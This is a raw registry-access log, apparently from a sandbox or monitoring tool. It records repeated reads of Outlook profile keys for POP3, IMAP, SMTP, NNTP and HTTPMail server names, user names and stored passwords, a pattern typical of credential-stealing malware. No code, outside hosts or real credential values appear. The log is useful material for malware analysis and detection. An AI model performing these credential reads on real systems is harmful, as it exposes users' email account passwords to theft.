Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Email Address False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, data = 114 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, data = 102 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User Name False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User Name False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Email Address False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP User Name False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Server False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Server False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User Name False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = 108 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP Server URL False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = 108 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail User Name False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail Server False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password2 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Password2 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Password2 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail Password2 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Password2 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Password False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
